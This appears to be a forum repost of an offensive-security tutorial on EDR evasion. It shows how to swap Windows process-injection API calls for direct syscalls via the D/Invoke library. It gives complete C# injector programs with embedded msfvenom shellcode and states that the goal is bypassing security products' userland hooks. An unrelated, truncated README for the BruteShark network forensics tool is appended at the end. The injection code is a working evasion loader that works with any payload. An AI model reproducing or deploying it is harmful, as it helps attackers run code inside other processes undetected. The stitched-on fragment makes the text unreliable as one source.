Nytro

Syscalls with D/Invoke Rasta Mouse Jan 24, 2021 11 min read c#.netdinvokesyscallsedr Windows Architecture Primer x86 processors have 4 privilege levels, known as rings, that control access to memory and CPU operations. They range from Ring 0, the most privileged, to Ring 3. Image credit: Wikipedia Windows only supports Rings 0 and 3, affectionately known as Kernel and User Mode respectively. The majority of user activity will occur in Ring 3 but applications may cross into Ring 0 when calling a variety of APIs - this is required when accessing the filesystem for example. There is also a hierarchy to the native APIs. User applications will generally call “high-level” APIs in kernel32 and user32 etc, and those APIs will call “low-level” APIs in ntdll. Image credit: TechNet If you’re familiar with basic process injection, you will know that APIs such as OpenProcess, VirtualAllocEx, WriteProcessMemory and CreateRemoteThread are often used - all of which live inside kernel32. OpenProcess itself calls NtOpenProcess which can be observed in a tool such as API Monitor. Security vendors realised that if they were going to detect and/or block this type of activity, then they would need to hook these APIs. There are different types of hooks that we won’t look into detail here - but think of a hook as a type of man-in-the-middle. Instead of pointing to the real function, an API call is redirected to a vendor-controlled module where it can be inspected and/or dropped. Image credit: Practical Malware Analysis At first, vendors were only hooking APIs within kernel32, such as OpenProcess. Attackers could circumvent this by calling NtOpenProcess directly (illustrated above) which would effectively bypass the vendors hook. Vendors obviously started to push back by also hooking the corresponding Nt* functions as well. So where do we go next? Syscalls A system call (syscall) is the means by which ntdll transitions to the kernel. We can “unassemble” NtOpenProcess in WinDBG easily enough to see the instructions. 0:000> u ntdll!NtOpenProcess ntdll!NtOpenProcess: 00007ffd`8570c460 4c8bd1 mov r10,rcx 00007ffd`8570c463 b826000000 mov eax,26h 00007ffd`8570c468 f604250803fe7f01 test byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1 00007ffd`8570c470 7503 jne ntdll!NtOpenProcess+0x15 (00007ffd`8570c475) 00007ffd`8570c472 0f05 syscall 00007ffd`8570c474 c3 ret 00007ffd`8570c475 cd2e int 2Eh 00007ffd`8570c477 c3 ret There are also excellent syscall lookup tables that we can use as well. D/Invoke has an excellent method called GetSyscallStub that will read ntdll from disk and find the syscall for a given API. To demonstrate - this is the API trace of the typical OpenProcess/VirtualAllocEx/WriteProcessMemory/CreateRemoteThread (I’ve blurred ones that are not directly related to the injection to preserve the clarity of the calls we want to focus on). This was tested with the following code: using System; using System.Runtime.InteropServices; namespace ConsoleApp1 { class Program { // msfvenom -p windows/x64/messagebox EXITFUNC=thread -f csharp static readonly byte[] _shellcode = new byte[323] { 0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51, 0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48, 0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48, 0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02, 0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e, 0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88, 0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48, 0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e, 0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41, 0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24, 0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0, 0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e, 0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41, 0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41, 0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1, 0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0x1a,0x01,0x00,0x00,0x3e,0x4c,0x8d, 0x85,0x2b,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff, 0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48, 0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13, 0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x48,0x65,0x6c,0x6c,0x6f, 0x2c,0x20,0x66,0x72,0x6f,0x6d,0x20,0x4d,0x53,0x46,0x21,0x00,0x4d,0x65,0x73, 0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x00 }; static void Main(string[] args) { var hProcess = OpenProcess( 0x001F0FFF, false, int.Parse(args[0])); var hRegion = VirtualAllocEx( hProcess, IntPtr.Zero, (uint)_shellcode.Length, 0x1000 | 0x2000, 0x04); // PAGE_READWRITE WriteProcessMemory( hProcess, hRegion, _shellcode, (uint)_shellcode.Length, out UIntPtr _); VirtualProtectEx( hProcess, hRegion, (UIntPtr)_shellcode.Length, 0x20, // PAGE_EXECUTE_READ out uint _); CreateRemoteThread( hProcess, IntPtr.Zero, 0, hRegion, IntPtr.Zero, 0, IntPtr.Zero); } [DllImport("kernel32.dll")] static extern IntPtr OpenProcess( int dwDesiredAccess, bool bInheritHandle, int dwProcessId); [DllImport("kernel32.dll")] static extern IntPtr VirtualAllocEx( IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll")] static extern bool WriteProcessMemory( IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten); [DllImport("kernel32.dll")] static extern bool VirtualProtectEx( IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); [DllImport("kernel32.dll")] static extern IntPtr CreateRemoteThread( IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); } } We shall now replace the standard P/Invoke with syscalls for each of these APIs. GetSyscallStub The first step is to replace the P/Invoke signatures with corresponding delegates targeting the Nt functions. For instance, OpenProcess will be replaced with: [UnmanagedFunctionPointer(CallingConvention.StdCall)] delegate NTSTATUS NtOpenProcess( ref IntPtr ProcessHandle, uint DesiredAccess, ref OBJECT_ATTRIBUTES ObjectAttributes, ref CLIENT_ID ClientId); [StructLayout(LayoutKind.Sequential, Pack = 0)] struct OBJECT_ATTRIBUTES { public int Length; public IntPtr RootDirectory; public IntPtr ObjectName; public uint Attributes; public IntPtr SecurityDescriptor; public IntPtr SecurityQualityOfService; } [StructLayout(LayoutKind.Sequential)] struct CLIENT_ID { public IntPtr UniqueProcess; public IntPtr UniqueThread; } (NTSTATUS is a pretty big enum that I’ve excluded for brevity). Next, get a pointer to the syscall: IntPtr stub = Generic.GetSyscallStub("NtOpenProcess"); GetSyscallStub only takes a FunctionName and not a target DLL, since syscalls only exist in ntdll. Marshal that pointer to the delegate: NtOpenProcess ntOpenProcess = (NtOpenProcess) Marshal.GetDelegateForFunctionPointer(stub, typeof(NtOpenProcess)); And then call the method: IntPtr hProcess = IntPtr.Zero; OBJECT_ATTRIBUTES oa = new OBJECT_ATTRIBUTES(); CLIENT_ID ci = new CLIENT_ID { UniqueProcess = (IntPtr)uint.Parse(args[0]) }; NTSTATUS result = ntOpenProcess( ref hProcess, 0x001F0FFF, ref oa, ref ci); The return code should be Success and hProcess now contains a value. result Success hProcess 0x00000000000003bc Final Code using DInvoke.DynamicInvoke; using System; using System.Runtime.InteropServices; namespace ConsoleApp1 { class Program { // msfvenom -p windows/x64/messagebox EXITFUNC=thread -f csharp static readonly byte[] _shellcode = new byte[323] { 0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51, 0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48, 0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48, 0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02, 0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e, 0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88, 0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48, 0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e, 0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41, 0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24, 0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0, 0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e, 0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41, 0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41, 0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1, 0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0x1a,0x01,0x00,0x00,0x3e,0x4c,0x8d, 0x85,0x2b,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff, 0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48, 0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13, 0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x48,0x65,0x6c,0x6c,0x6f, 0x2c,0x20,0x66,0x72,0x6f,0x6d,0x20,0x4d,0x53,0x46,0x21,0x00,0x4d,0x65,0x73, 0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x00 }; static void Main(string[] args) { // NtOpenProcess IntPtr stub = Generic.GetSyscallStub("NtOpenProcess"); NtOpenProcess ntOpenProcess = (NtOpenProcess) Marshal.GetDelegateForFunctionPointer(stub, typeof(NtOpenProcess)); IntPtr hProcess = IntPtr.Zero; OBJECT_ATTRIBUTES oa = new OBJECT_ATTRIBUTES(); CLIENT_ID ci = new CLIENT_ID { UniqueProcess = (IntPtr)uint.Parse(args[0]) }; NTSTATUS result = ntOpenProcess( ref hProcess, 0x001F0FFF, ref oa, ref ci); // NtAllocateVirtualMemory stub = Generic.GetSyscallStub("NtAllocateVirtualMemory"); NtAllocateVirtualMemory ntAllocateVirtualMemory = (NtAllocateVirtualMemory) Marshal.GetDelegateForFunctionPointer(stub, typeof(NtAllocateVirtualMemory)); IntPtr baseAddress = IntPtr.Zero; IntPtr regionSize = (IntPtr)_shellcode.Length; result = ntAllocateVirtualMemory( hProcess, ref baseAddress, IntPtr.Zero, ref regionSize, 0x1000 | 0x2000, 0x04); // NtWriteVirtualMemory stub = Generic.GetSyscallStub("NtWriteVirtualMemory"); NtWriteVirtualMemory ntWriteVirtualMemory = (NtWriteVirtualMemory) Marshal.GetDelegateForFunctionPointer(stub, typeof(NtWriteVirtualMemory)); var buffer = Marshal.AllocHGlobal(_shellcode.Length); Marshal.Copy(_shellcode, 0, buffer, _shellcode.Length); uint bytesWritten = 0; result = ntWriteVirtualMemory( hProcess, baseAddress, buffer, (uint)_shellcode.Length, ref bytesWritten); // NtProtectVirtualMemory stub = Generic.GetSyscallStub("NtProtectVirtualMemory"); NtProtectVirtualMemory ntProtectVirtualMemory = (NtProtectVirtualMemory) Marshal.GetDelegateForFunctionPointer(stub, typeof(NtProtectVirtualMemory)); uint oldProtect = 0; result = ntProtectVirtualMemory( hProcess, ref baseAddress, ref regionSize, 0x20, ref oldProtect); // NtCreateThreadEx stub = Generic.GetSyscallStub("NtCreateThreadEx"); NtCreateThreadEx ntCreateThreadEx = (NtCreateThreadEx) Marshal.GetDelegateForFunctionPointer(stub, typeof(NtCreateThreadEx)); IntPtr hThread = IntPtr.Zero; result = ntCreateThreadEx( out hThread, ACCESS_MASK.MAXIMUM_ALLOWED, IntPtr.Zero, hProcess, baseAddress, IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero); } [UnmanagedFunctionPointer(CallingConvention.StdCall)] delegate NTSTATUS NtOpenProcess( ref IntPtr ProcessHandle, uint DesiredAccess, ref OBJECT_ATTRIBUTES ObjectAttributes, ref CLIENT_ID ClientId); [UnmanagedFunctionPointer(CallingConvention.StdCall)] delegate NTSTATUS NtAllocateVirtualMemory( IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref IntPtr RegionSize, uint AllocationType, uint Protect); [UnmanagedFunctionPointer(CallingConvention.StdCall)] delegate NTSTATUS NtWriteVirtualMemory( IntPtr ProcessHandle, IntPtr BaseAddress, IntPtr Buffer, uint BufferLength, ref uint BytesWritten); [UnmanagedFunctionPointer(CallingConvention.StdCall)] delegate NTSTATUS NtProtectVirtualMemory( IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr RegionSize, uint NewProtect, ref uint OldProtect); [UnmanagedFunctionPointer(CallingConvention.StdCall)] delegate NTSTATUS NtCreateThreadEx( out IntPtr threadHandle, ACCESS_MASK desiredAccess, IntPtr objectAttributes, IntPtr processHandle, IntPtr startAddress, IntPtr parameter, bool createSuspended, int stackZeroBits, int sizeOfStack, int maximumStackSize, IntPtr attributeList); [StructLayout(LayoutKind.Sequential, Pack = 0)] struct OBJECT_ATTRIBUTES { public int Length; public IntPtr RootDirectory; public IntPtr ObjectName; public uint Attributes; public IntPtr SecurityDescriptor; public IntPtr SecurityQualityOfService; } [StructLayout(LayoutKind.Sequential)] struct CLIENT_ID { public IntPtr UniqueProcess; public IntPtr UniqueThread; } [Flags] enum ACCESS_MASK : uint { DELETE = 0x00010000, READ_CONTROL = 0x00020000, WRITE_DAC = 0x00040000, WRITE_OWNER = 0x00080000, SYNCHRONIZE = 0x00100000, STANDARD_RIGHTS_REQUIRED = 0x000F0000, STANDARD_RIGHTS_READ = 0x00020000, STANDARD_RIGHTS_WRITE = 0x00020000, STANDARD_RIGHTS_EXECUTE = 0x00020000, STANDARD_RIGHTS_ALL = 0x001F0000, SPECIFIC_RIGHTS_ALL = 0x0000FFF, ACCESS_SYSTEM_SECURITY = 0x01000000, MAXIMUM_ALLOWED = 0x02000000, GENERIC_READ = 0x80000000, GENERIC_WRITE = 0x40000000, GENERIC_EXECUTE = 0x20000000, GENERIC_ALL = 0x10000000, DESKTOP_READOBJECTS = 0x00000001, DESKTOP_CREATEWINDOW = 0x00000002, DESKTOP_CREATEMENU = 0x00000004, DESKTOP_HOOKCONTROL = 0x00000008, DESKTOP_JOURNALRECORD = 0x00000010, DESKTOP_JOURNALPLAYBACK = 0x00000020, DESKTOP_ENUMERATE = 0x00000040, DESKTOP_WRITEOBJECTS = 0x00000080, DESKTOP_SWITCHDESKTOP = 0x00000100, WINSTA_ENUMDESKTOPS = 0x00000001, WINSTA_READATTRIBUTES = 0x00000002, WINSTA_ACCESSCLIPBOARD = 0x00000004, WINSTA_CREATEDESKTOP = 0x00000008, WINSTA_WRITEATTRIBUTES = 0x00000010, WINSTA_ACCESSGLOBALATOMS = 0x00000020, WINSTA_EXITWINDOWS = 0x00000040, WINSTA_ENUMERATE = 0x00000100, WINSTA_READSCREEN = 0x00000200, WINSTA_ALL_ACCESS = 0x0000037F, SECTION_ALL_ACCESS = 0x10000000, SECTION_QUERY = 0x0001, SECTION_MAP_WRITE = 0x0002, SECTION_MAP_READ = 0x0004, SECTION_MAP_EXECUTE = 0x0008, SECTION_EXTEND_SIZE = 0x0010 }; [Flags] enum NTSTATUS : uint { // Success Success = 0x00000000, Wait0 = 0x00000000, Wait1 = 0x00000001, Wait2 = 0x00000002, Wait3 = 0x00000003, Wait63 = 0x0000003f, Abandoned = 0x00000080, AbandonedWait0 = 0x00000080, AbandonedWait1 = 0x00000081, AbandonedWait2 = 0x00000082, AbandonedWait3 = 0x00000083, AbandonedWait63 = 0x000000bf, UserApc = 0x000000c0, KernelApc = 0x00000100, Alerted = 0x00000101, Timeout = 0x00000102, Pending = 0x00000103, Reparse = 0x00000104, MoreEntries = 0x00000105, NotAllAssigned = 0x00000106, SomeNotMapped = 0x00000107, OpLockBreakInProgress = 0x00000108, VolumeMounted = 0x00000109, RxActCommitted = 0x0000010a, NotifyCleanup = 0x0000010b, NotifyEnumDir = 0x0000010c, NoQuotasForAccount = 0x0000010d, PrimaryTransportConnectFailed = 0x0000010e, PageFaultTransition = 0x00000110, PageFaultDemandZero = 0x00000111, PageFaultCopyOnWrite = 0x00000112, PageFaultGuardPage = 0x00000113, PageFaultPagingFile = 0x00000114, CrashDump = 0x00000116, ReparseObject = 0x00000118, NothingToTerminate = 0x00000122, ProcessNotInJob = 0x00000123, ProcessInJob = 0x00000124, ProcessCloned = 0x00000129, FileLockedWithOnlyReaders = 0x0000012a, FileLockedWithWriters = 0x0000012b, // Informational Informational = 0x40000000, ObjectNameExists = 0x40000000, ThreadWasSuspended = 0x40000001, WorkingSetLimitRange = 0x40000002, ImageNotAtBase = 0x40000003, RegistryRecovered = 0x40000009, // Warning Warning = 0x80000000, GuardPageViolation = 0x80000001, DatatypeMisalignment = 0x80000002, Breakpoint = 0x80000003, SingleStep = 0x80000004, BufferOverflow = 0x80000005, NoMoreFiles = 0x80000006, HandlesClosed = 0x8000000a, PartialCopy = 0x8000000d, DeviceBusy = 0x80000011, InvalidEaName = 0x80000013, EaListInconsistent = 0x80000014, NoMoreEntries = 0x8000001a, LongJump = 0x80000026, DllMightBeInsecure = 0x8000002b, // Error Error = 0xc0000000, Unsuccessful = 0xc0000001, NotImplemented = 0xc0000002, InvalidInfoClass = 0xc0000003, InfoLengthMismatch = 0xc0000004, AccessViolation = 0xc0000005, InPageError = 0xc0000006, PagefileQuota = 0xc0000007, InvalidHandle = 0xc0000008, BadInitialStack = 0xc0000009, BadInitialPc = 0xc000000a, InvalidCid = 0xc000000b, TimerNotCanceled = 0xc000000c, InvalidParameter = 0xc000000d, NoSuchDevice = 0xc000000e, NoSuchFile = 0xc000000f, InvalidDeviceRequest = 0xc0000010, EndOfFile = 0xc0000011, WrongVolume = 0xc0000012, NoMediaInDevice = 0xc0000013, NoMemory = 0xc0000017, ConflictingAddresses = 0xc0000018, NotMappedView = 0xc0000019, UnableToFreeVm = 0xc000001a, UnableToDeleteSection = 0xc000001b, IllegalInstruction = 0xc000001d, AlreadyCommitted = 0xc0000021, AccessDenied = 0xc0000022, BufferTooSmall = 0xc0000023, ObjectTypeMismatch = 0xc0000024, NonContinuableException = 0xc0000025, BadStack = 0xc0000028, NotLocked = 0xc000002a, NotCommitted = 0xc000002d, InvalidParameterMix = 0xc0000030, ObjectNameInvalid = 0xc0000033, ObjectNameNotFound = 0xc0000034, ObjectNameCollision = 0xc0000035, ObjectPathInvalid = 0xc0000039, ObjectPathNotFound = 0xc000003a, ObjectPathSyntaxBad = 0xc000003b, DataOverrun = 0xc000003c, DataLate = 0xc000003d, DataError = 0xc000003e, CrcError = 0xc000003f, SectionTooBig = 0xc0000040, PortConnectionRefused = 0xc0000041, InvalidPortHandle = 0xc0000042, SharingViolation = 0xc0000043, QuotaExceeded = 0xc0000044, InvalidPageProtection = 0xc0000045, MutantNotOwned = 0xc0000046, SemaphoreLimitExceeded = 0xc0000047, PortAlreadySet = 0xc0000048, SectionNotImage = 0xc0000049, SuspendCountExceeded = 0xc000004a, ThreadIsTerminating = 0xc000004b, BadWorkingSetLimit = 0xc000004c, IncompatibleFileMap = 0xc000004d, SectionProtection = 0xc000004e, EasNotSupported = 0xc000004f, EaTooLarge = 0xc0000050, NonExistentEaEntry = 0xc0000051, NoEasOnFile = 0xc0000052, EaCorruptError = 0xc0000053, FileLockConflict = 0xc0000054, LockNotGranted = 0xc0000055, DeletePending = 0xc0000056, CtlFileNotSupported = 0xc0000057, UnknownRevision = 0xc0000058, RevisionMismatch = 0xc0000059, InvalidOwner = 0xc000005a, InvalidPrimaryGroup = 0xc000005b, NoImpersonationToken = 0xc000005c, CantDisableMandatory = 0xc000005d, NoLogonServers = 0xc000005e, NoSuchLogonSession = 0xc000005f, NoSuchPrivilege = 0xc0000060, PrivilegeNotHeld = 0xc0000061, InvalidAccountName = 0xc0000062, UserExists = 0xc0000063, NoSuchUser = 0xc0000064, GroupExists = 0xc0000065, NoSuchGroup = 0xc0000066, MemberInGroup = 0xc0000067, MemberNotInGroup = 0xc0000068, LastAdmin = 0xc0000069, WrongPassword = 0xc000006a, IllFormedPassword = 0xc000006b, PasswordRestriction = 0xc000006c, LogonFailure = 0xc000006d, AccountRestriction = 0xc000006e, InvalidLogonHours = 0xc000006f, InvalidWorkstation = 0xc0000070, PasswordExpired = 0xc0000071, AccountDisabled = 0xc0000072, NoneMapped = 0xc0000073, TooManyLuidsRequested = 0xc0000074, LuidsExhausted = 0xc0000075, InvalidSubAuthority = 0xc0000076, InvalidAcl = 0xc0000077, InvalidSid = 0xc0000078, InvalidSecurityDescr = 0xc0000079, ProcedureNotFound = 0xc000007a, InvalidImageFormat = 0xc000007b, NoToken = 0xc000007c, BadInheritanceAcl = 0xc000007d, RangeNotLocked = 0xc000007e, DiskFull = 0xc000007f, ServerDisabled = 0xc0000080, ServerNotDisabled = 0xc0000081, TooManyGuidsRequested = 0xc0000082, GuidsExhausted = 0xc0000083, InvalidIdAuthority = 0xc0000084, AgentsExhausted = 0xc0000085, InvalidVolumeLabel = 0xc0000086, SectionNotExtended = 0xc0000087, NotMappedData = 0xc0000088, ResourceDataNotFound = 0xc0000089, ResourceTypeNotFound = 0xc000008a, ResourceNameNotFound = 0xc000008b, ArrayBoundsExceeded = 0xc000008c, FloatDenormalOperand = 0xc000008d, FloatDivideByZero = 0xc000008e, FloatInexactResult = 0xc000008f, FloatInvalidOperation = 0xc0000090, FloatOverflow = 0xc0000091, FloatStackCheck = 0xc0000092, FloatUnderflow = 0xc0000093, IntegerDivideByZero = 0xc0000094, IntegerOverflow = 0xc0000095, PrivilegedInstruction = 0xc0000096, TooManyPagingFiles = 0xc0000097, FileInvalid = 0xc0000098, InsufficientResources = 0xc000009a, InstanceNotAvailable = 0xc00000ab, PipeNotAvailable = 0xc00000ac, InvalidPipeState = 0xc00000ad, PipeBusy = 0xc00000ae, IllegalFunction = 0xc00000af, PipeDisconnected = 0xc00000b0, PipeClosing = 0xc00000b1, PipeConnected = 0xc00000b2, PipeListening = 0xc00000b3, InvalidReadMode = 0xc00000b4, IoTimeout = 0xc00000b5, FileForcedClosed = 0xc00000b6, ProfilingNotStarted = 0xc00000b7, ProfilingNotStopped = 0xc00000b8, NotSameDevice = 0xc00000d4, FileRenamed = 0xc00000d5, CantWait = 0xc00000d8, PipeEmpty = 0xc00000d9, CantTerminateSelf = 0xc00000db, InternalError = 0xc00000e5, InvalidParameter1 = 0xc00000ef, InvalidParameter2 = 0xc00000f0, InvalidParameter3 = 0xc00000f1, InvalidParameter4 = 0xc00000f2, InvalidParameter5 = 0xc00000f3, InvalidParameter6 = 0xc00000f4, InvalidParameter7 = 0xc00000f5, InvalidParameter8 = 0xc00000f6, InvalidParameter9 = 0xc00000f7, InvalidParameter10 = 0xc00000f8, InvalidParameter11 = 0xc00000f9, InvalidParameter12 = 0xc00000fa, ProcessIsTerminating = 0xc000010a, MappedFileSizeZero = 0xc000011e, TooManyOpenedFiles = 0xc000011f, Cancelled = 0xc0000120, CannotDelete = 0xc0000121, InvalidComputerName = 0xc0000122, FileDeleted = 0xc0000123, SpecialAccount = 0xc0000124, SpecialGroup = 0xc0000125, SpecialUser = 0xc0000126, MembersPrimaryGroup = 0xc0000127, FileClosed = 0xc0000128, TooManyThreads = 0xc0000129, ThreadNotInProcess = 0xc000012a, TokenAlreadyInUse = 0xc000012b, PagefileQuotaExceeded = 0xc000012c, CommitmentLimit = 0xc000012d, InvalidImageLeFormat = 0xc000012e, InvalidImageNotMz = 0xc000012f, InvalidImageProtect = 0xc0000130, InvalidImageWin16 = 0xc0000131, LogonServer = 0xc0000132, DifferenceAtDc = 0xc0000133, SynchronizationRequired = 0xc0000134, DllNotFound = 0xc0000135, IoPrivilegeFailed = 0xc0000137, OrdinalNotFound = 0xc0000138, EntryPointNotFound = 0xc0000139, ControlCExit = 0xc000013a, InvalidAddress = 0xc0000141, PortNotSet = 0xc0000353, DebuggerInactive = 0xc0000354, CallbackBypass = 0xc0000503, PortClosed = 0xc0000700, MessageLost = 0xc0000701, InvalidMessage = 0xc0000702, RequestCanceled = 0xc0000703, RecursiveDispatch = 0xc0000704, LpcReceiveBufferExpected = 0xc0000705, LpcInvalidConnectionUsage = 0xc0000706, LpcRequestsNotAllowed = 0xc0000707, ResourceInUse = 0xc0000708, ProcessIsProtected = 0xc0000712, VolumeDirty = 0xc0000806, FileCheckedOut = 0xc0000901, CheckOutRequired = 0xc0000902, BadFileType = 0xc0000903, FileTooLarge = 0xc0000904, FormsAuthRequired = 0xc0000905, VirusInfected = 0xc0000906, VirusDeleted = 0xc0000907, TransactionalConflict = 0xc0190001, InvalidTransaction = 0xc0190002, TransactionNotActive = 0xc0190003, TmInitializationFailed = 0xc0190004, RmNotActive = 0xc0190005, RmMetadataCorrupt = 0xc0190006, TransactionNotJoined = 0xc0190007, DirectoryNotRm = 0xc0190008, CouldNotResizeLog = 0xc0190009, TransactionsUnsupportedRemote = 0xc019000a, LogResizeInvalidSize = 0xc019000b, RemoteFileVersionMismatch = 0xc019000c, CrmProtocolAlreadyExists = 0xc019000f, TransactionPropagationFailed = 0xc0190010, CrmProtocolNotFound = 0xc0190011, TransactionSuperiorExists = 0xc0190012, TransactionRequestNotValid = 0xc0190013, TransactionNotRequested = 0xc0190014, TransactionAlreadyAborted = 0xc0190015, TransactionAlreadyCommitted = 0xc0190016, TransactionInvalidMarshallBuffer = 0xc0190017, CurrentTransactionNotValid = 0xc0190018, LogGrowthFailed = 0xc0190019, ObjectNoLongerExists = 0xc0190021, StreamMiniversionNotFound = 0xc0190022, StreamMiniversionNotValid = 0xc0190023, MiniversionInaccessibleFromSpecifiedTransaction = 0xc0190024, CantOpenMiniversionWithModifyIntent = 0xc0190025, CantCreateMoreStreamMiniversions = 0xc0190026, HandleNoLongerValid = 0xc0190028, NoTxfMetadata = 0xc0190029, LogCorruptionDetected = 0xc0190030, CantRecoverWithHandleOpen = 0xc0190031, RmDisconnected = 0xc0190032, EnlistmentNotSuperior = 0xc0190033, RecoveryNotNeeded = 0xc0190034, RmAlreadyStarted = 0xc0190035, FileIdentityNotPersistent = 0xc0190036, CantBreakTransactionalDependency = 0xc0190037, CantCrossRmBoundary = 0xc0190038, TxfDirNotEmpty = 0xc0190039, IndoubtTransactionsExist = 0xc019003a, TmVolatile = 0xc019003b, RollbackTimerExpired = 0xc019003c, TxfAttributeCorrupt = 0xc019003d, EfsNotAllowedInTransaction = 0xc019003e, TransactionalOpenNotAllowed = 0xc019003f, TransactedMappingUnsupportedRemote = 0xc0190040, TxfMetadataAlreadyPresent = 0xc0190041, TransactionScopeCallbacksNotSet = 0xc0190042, TransactionRequiredPromotion = 0xc0190043, CannotExecuteFileInTransaction = 0xc0190044, TransactionsNotFrozen = 0xc0190045, MaximumNtStatus = 0xffffffff } } } This is definately not as straight forward as using P/Invoke, but it’s a very effective means of evading defensive products that employ userland hooking. API Monitor does not detect the use of these APIs - but feel free to verify that for yourself! Sursa: https://offensivedefence.co.uk/posts/dinvoke-syscalls/

About What it can do Download Examples Usage Modules BruteSharkDesktop BruteSharkCli Architecture Contributing About BruteShark is a Network Forensic Analysis Tool (NFAT) that performs deep processing and inspection of network traffic (mainly PCAP files). It includes: password extracting, building a network map, reconstruct TCP sessions, extract hashes of encrypted passwords and even convert them to a Hashcat format in order to perform an offline Brute Force attack. The main goal of the project is to provide solution to security researchers and network administrators with the task of network traffic analysis while they try to identify weaknesses that can be used by a potential attacker to gain access to critical points on the network. Two BruteShark versions are available, A GUI based application (Windows) and a Command Line Interface tool (Windows and Linux). The various projects in the solution can also be used independently as infrastructure for analyzing network traffic on Linux or Windows machines. For further details see the Architecture section. The project was developed in my spare time to address two main passions of mine: software architecture and analyzing network data. I love to get feedbacks from BruteShark users, your opinion is important to me! Feel free to contact me on contact.oded.shimon@gmail.com or create new issue. Please ⭐️ this repository if this project helped you! Also, if you're feeling generous, you can buy 